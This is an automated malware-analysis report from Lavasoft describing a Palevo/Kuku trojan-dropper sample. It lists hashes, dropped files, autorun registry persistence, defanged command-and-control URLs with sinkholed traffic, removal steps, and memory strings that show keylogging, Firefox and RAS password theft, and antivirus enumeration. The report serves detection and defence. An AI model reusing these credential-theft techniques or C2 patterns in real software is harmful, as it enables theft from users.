Generic.Palevo.4.B16E9B30_baded12134

by malwarelabrobot on April 17th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.zuz (Kaspersky), Generic.Palevo.4.B16E9B30 (B) (Emsisoft), Generic.Palevo.4.B16E9B30 (AdAware), GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: baded12134e3e146644f0b7ba7ef7bbe
SHA1: 74d57a3aa20db240a5f75a7e605a98bbf5931ebd
SHA256: 12f31cdfb88ab5483a0c4b2f0dfa30f0b1a06ffe3e9e0c7c5c7a0849d09e616a
SSDeep: 6144:DlrtwKs6FpaPyP8 YC3GPQhm7gQa9UQty:RyJPyNz2xp
Size: 232448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Generic creates the following process(es):

Host Booter bot.exe:1676
bot.exe:576
%original file name%.exe:196

The Generic injects its code into the following process(es):

Xr HoSt BooTer.exe:1704
iexplore.exe:1052

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Xr HoSt BooTer.exe:1704 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%System%\vcmgcd32.dll (1568 bytes)
%System%\vcmgcd32.dl_ (17 bytes)
%WinDir%\system.ini (78 bytes)

The Generic deletes the following file(s):

C:\KUKU300a (0 bytes)

The process bot.exe:576 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe (601 bytes)

The process %original file name%.exe:196 makes changes in the file system.
The Generic creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Host Booter bot.exe (84 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Xr HoSt BooTer.exe (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bot.exe (125 bytes)

Registry activity

The process Host Booter bot.exe:1676 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B8 39 97 C8 37 EC 8B 28 8D D7 EF 3D D0 FD 2D"

[HKCU\Software\VeGaS iZ SiK Youtube1]
"FileNameAtual" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Host Booter bot.exe"

The process Xr HoSt BooTer.exe:1704 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC A0 0D F3 9A E7 F2 5F 99 5B 08 F6 A8 D7 19 38"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Generic deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process bot.exe:576 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B E8 D6 84 6B DD AD 93 4E 57 65 95 CE D1 F9 57"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Microsoft]
"svchost.exe" = "svchost"

The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Generic adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe"

The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:196 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E CB 02 A4 CC 9A 82 ED 8B 92 96 81 F5 B4 90 96"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Xr HoSt BooTer.exe" = "Xr HoSt BooTer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Host Booter bot.exe" = "Host Booter bot"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"bot.exe" = "bot"

The Generic modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Generic modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Generic modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
49e17a08fde2dc17462f97194220a0d8 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\svchost.exe
6ebf6e3875db3dfad9a85ebe2c2f98da c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Host Booter bot.exe
558d0867bf4c786e1a0142188ab52773 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Xr HoSt BooTer.exe
49e17a08fde2dc17462f97194220a0d8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bot.exe
5facec93ec966a2577075d44e2ba63c7 c:\WINDOWS\system32\Cerberus\server.exe
ae22ca9f11ade8e362254b452cc07f78 c:\WINDOWS\system32\vcmgcd32.dll
3d0f7adfc75103a1902392c9fd39ed4f c:\%original file name%.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 270336 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 274432 221184 217600 5.43823 aa4e34921c6d21139b95027c2595f82d
.rsrc 495616 24576 13824 3.25579 5a3e9955070a8ff7f774b88ddcb0c1a1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.he3ns1k.info/mrow_pin/?id1398046enwbl8378&rnd=1410734 166.78.144.80
hxxp://www.he3ns1k.info/mrow_pin/?id1398046enwbl8378&rnd=1415500 166.78.144.80
hxxp://www.informat1onupd.info/mrow_pin/?id1398046enwbl8378&rnd=1420140 192.155.89.148
hxxp://www.g1ikdcvns3sdsal.info/mrow_pin/?id1398046enwbl8378&rnd=1415500 166.78.144.80
www.microsoft.com 23.64.223.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Sality Virus User Agent Detected (KUKU)
ET TROJAN Known Sinkhole Response Header

Traffic

GET /mrow_pin/?id1398046enwbl8378&rnd=1415500 HTTP/1.1
User-Agent: KUKU v3.09 exp
Host: VVV.g1ikdcvns3sdsal.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 22:22:15 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
HTTP/1.1 200 OK..Date: Wed, 15 Apr 2015 22:22:15 GMT..Server: Apache/2
.2.20 (Ubuntu)..X-Sinkhole: malware-sinkhole..Vary: Accept-Encoding..C
ontent-Length: 0..Content-Type: text/html..



GET /mrow_pin/?id1398046enwbl8378&rnd=1410734 HTTP/1.1
User-Agent: KUKU v3.09 exp
Host: VVV.he3ns1k.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 22:22:10 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
HTTP/1.1 200 OK..Date: Wed, 15 Apr 2015 22:22:10 GMT..Server: Apache/2
.2.20 (Ubuntu)..X-Sinkhole: malware-sinkhole..Vary: Accept-Encoding..C
ontent-Length: 0..Content-Type: text/html..

The Generic connects to the servers at the folowing location(s):

Xr HoSt BooTer.exe_1704:

.text
.data
.rsrc
@.rdata
MSVBVM60.DLL
!"3"2"2''(
Gh.AJ
MSComctlLib.StatusBar
MSComctlLib.ProgressBar
Port!
MSComctlLib.ListView
(7),01444
'9=82<.342
MSWinsockLib.Winsock
PoRT
MSWINSCK.OCX
mscomctl.ocx
%WinDir%\System32\MSWINSCK.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\SpliT Productions\FPD By SpliT\mscomctl.oca
VBA6.DLL
%System%\vcmgcd32.dll
\vcmgcd32.dl_
Win32.HLLP.Kuku v3.09 stub=->KERNEL32
.reloc
NEL32.dl
;@") '/(
D2.KB99
LL5Ad%s%d
.%c%s
0<5<;<@<
5&6_ 647
@,000408
(2,20242
*\A%Documents and Settings%\Ash.ASH-46SWIJD8EAP\Desktop\projects\Visual Basic\X-R Host Boot\Project1.vbp
2c49f800-c2dd-11cf-9ad6-0080c7e7b78d
9368265E-85FE-11d1-8BE3-0000F8754DA1
Port
HTTP-
PORTFLOOD-
A*\A%Documents and Settings%\Ash.ASH-46SWIJD8EAP\Desktop\projects\Visual Basic\X-R Host Boot\Project1.vbp
Host Booter 2.exe

Xr HoSt BooTer.exe_1704_rwx_00401000_00001000:

!"3"2"2''(

Xr HoSt BooTer.exe_1704_rwx_00430000_00005000:

%System%\vcmgcd32.dll
\vcmgcd32.dl_
Win32.HLLP.Kuku v3.09 stub=->KERNEL32
.reloc
NEL32.dl
;@") '/(
D2.KB99
LL5Ad%s%d
.%c%s
0<5<;<@<
5&6_ 647
@,000408
(2,20242

iexplore.exe_1052:

%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

iexplore.exe_1052_rwx_00150000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00290000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_002D0000_00001000:

KERNEL32.DLL

svchost.exe_664:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
SQL error or missing database
An internal logic error in SQLite
Operation terminated by sqlite3_interrupt()
Uses OS features not supported on host
2nd parameter to sqlite3_bind out of range
sqlite3_step() has another row ready
sqlite3_step() has finished executing
Unknown SQLite Error Code "
ESQLiteException
TSQLiteDatabaselHA
TSQLiteTable
sqlite3_open
sqlite3_errmsg
sqlite3_free
sqlite3_close
sqlite3_last_insert_rowid
sqlite3_total_changes
sqlite3_errcode
sqlite3_bind_text
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_double
sqlite3_bind_null
sqlite3_bind_blob
sqlite3_prepare_v2
sqlite3_step
sqlite3_reset
sqlite3_finalize
sqlite3_prepare
sqlite3_busy_timeout
sqlite3_libversion
sqlite3_create_collation
sqlite3_bind_parameter_index
sqlite3_changes
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_column_type
sqlite3_column_int64
sqlite3_column_double
sqlite3_column_bytes
sqlite3_column_blob
sqlite3_column_text
Failed to open database "%s" : %s
Failed to open database "%s" : unknown error
Error [%d]: %s.
"%s": %s
Error executing SQL
Could not prepare SQL statement
Error executing SQL statement
SQLite is Busy
udprec
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
:\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
\Mozilla Firefox\
nss3.dll
mozcrt19.dll
sqlite3.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
softokn3.dll
PK11_GetInternalKeySlot
userenv.dll
\Mozilla\Firefox\
profiles.ini
\signons3.txt
\Mozilla\Firefox\profiles.ini
signons.sqlite
SELECT * FROM moz_logins
encryptedPassword
Urlmon.dll
Shell32.dll
URLDownloadToFileA
ShellExecuteA
Future Windows version (unknown)
Windows
MSGBOX
UDPStart|
SOFTWARE\Mozilla\Mozilla Firefox\
WEBDL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
svchost.exe
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegCreateKeyExA
GetCPInfo
wsock32.dll
shell32.dll
SQLite3
KWindows
UrlMon
SQLiteTable3
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation

iexplore.exe_1052_rwx_00310000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00350000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00390000_00001000:

KERNEL32.DLL

iexplore.exe_1052_rwx_00C40000_00001000:

advapi32.dll

iexplore.exe_1052_rwx_00D80000_00001000:

advapi32.dll

iexplore.exe_1052_rwx_00DB0000_00001000:

crypt32.dll

iexplore.exe_1052_rwx_00EF0000_00001000:

crypt32.dll

iexplore.exe_1052_rwx_00F20000_00001000:

gdi32.dll

iexplore.exe_1052_rwx_01060000_00001000:

gdi32.dll

iexplore.exe_1052_rwx_01090000_00001000:

ntdll.dll

iexplore.exe_1052_rwx_011D0000_00001000:

ntdll.dll

iexplore.exe_1052_rwx_01200000_00001000:

ole32.dll

iexplore.exe_1052_rwx_01340000_00001000:

ole32.dll

iexplore.exe_1052_rwx_01370000_00001000:

oleaut32.dll

iexplore.exe_1052_rwx_014B0000_00001000:

oleaut32.dll

iexplore.exe_1052_rwx_014E0000_00001000:

pstorec.dll

iexplore.exe_1052_rwx_01620000_00001000:

pstorec.dll

iexplore.exe_1052_rwx_01650000_00001000:

rasapi32.dll

iexplore.exe_1052_rwx_01790000_00001000:

rasapi32.dll

iexplore.exe_1052_rwx_017C0000_00001000:

shell32.dll

iexplore.exe_1052_rwx_01910000_00001000:

shell32.dll

iexplore.exe_1052_rwx_01940000_00001000:

user32.dll

iexplore.exe_1052_rwx_01980000_00001000:

user32.dll

iexplore.exe_1052_rwx_019B0000_00001000:

wsock32.dll

iexplore.exe_1052_rwx_019F0000_00001000:

wsock32.dll

iexplore.exe_1052_rwx_10410000_00036000:

`.rsrc
Portions Copyright (c) 1999,2003 Avenger by NhT
%s -- %s
SHFileOperationA
shell32.dll
URLDownloadToFileA
urlmon.dll
AVICAP32.dll
ntdll.dll
http\shell\open\command
\Internet Explorer\iexplore.exe
kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
ShellExecuteA
SOFTWARE\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
####@####
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
ReadTCPTable
ReadUdpTable
CloseTcpConnect
dllpass
StartTransferWebcam
StopTransferWebcam
CarregarVariaveisWebCam
WindowsExit
LowLevelKeybdHookProc
CarregarVariaveisWindows
teste.vbs
teste.txt
Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")
Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)
Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)
Set objFileSystem = CreateObject("Scripting.fileSystemObject")
Set objFile = objFileSystem.CreateTextFile("
Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter
Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter
objFile.WriteLine(Info)
objFile.Close
cscript.exe
Windows NT 4.0
Windows 2000
Windows XP
Windows Server 2003
Windows Vista
Windows 7
Windows 95
Windows 98
Windows Me
Cerberus_LOG.txt
Cerberus Keylogger
] ---> [
Password
UnitPasswords
advapi32.dll
WindowsLive:name=*
xxxyyyzzz.dat
\Mozilla Firefox\
mozcrt19.dll
sqlite3.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
userenv.dll
\Mozilla\Firefox\
profiles.ini
\signons3.txt
\signons2.txt
\signons1.txt
\signons.txt
(unnamed password)
uURLHistory
Password:
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
RAS Passwords |
1.1.1.1
0.0.0.0
LogErros_server.txt
windowslistar
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
FirstExecution
getpassword|getmsn|
getpassword|getfirefox|
getpassword|getras|
getpassword|getie|
getpassword|getnoip|
openweb
getpassword
windowsmanager|mensagens|
windowsmanager|windowslistar|
windowsfechar
windowsmax
windowsmin
windowsmostrar
windowsocultar
windowsmintodas
windowscaption
xxyyzz.dat
xyzxyz.dat
keyloggersituacao
keylogger|keyloggersituacao|keyloggerativar|
keylogger|keyloggersituacao|keyloggerdesativar|
keyloggerativar
keyloggerdesativar
keyloggerdeletar
keyloggerenviar
keylogger|mensagens|zero|
keylogger
keyloggerenviar|
remotewebcamenviar
remotewebcamparar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
listarportasdns
portasativas|mensagens|
portasativas|listarportas|
listarportas
(##()@@ (##()@@ (##()@@
Config.Cerberus
%SYS%
ÞSKTOP%
plugin.dat
logs.dat
?456789:;<=
!"#$%&'()* ,-./0123
####@####
####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@#### ####@####
####@#### ####@#### ####@####
####@#### ####@####
KWindows
UnitExecuteCommand
IEpasswords
KuURLHistory
UnitKeylogger
WinExec
SetNamedPipeHandleState
GetProcessHeap
CreatePipe
RegOpenKeyExA
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyA
RegCloseKey
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyboardState
GetKeyState
GetAsyncKeyState
5&&&-&&#
.idata
.reloc
P.rsrc
.melRBy
]~c.gD
.id\I7v
KERNEL32.DLL
crypt32.dll
gdi32.dll
ole32.dll
oleaut32.dll
pstorec.dll
user32.dll
wsock32.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Host Booter bot.exe:1676
    bot.exe:576
    %original file name%.exe:196

  2. Delete the original Generic file.
  3. Delete or disinfect the following files created/modified by the Generic:

    %System%\vcmgcd32.dll (1568 bytes)
    %System%\vcmgcd32.dl_ (17 bytes)
    %WinDir%\system.ini (78 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Host Booter bot.exe (84 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Xr HoSt BooTer.exe (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bot.exe (125 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "svchost.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\svchost.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now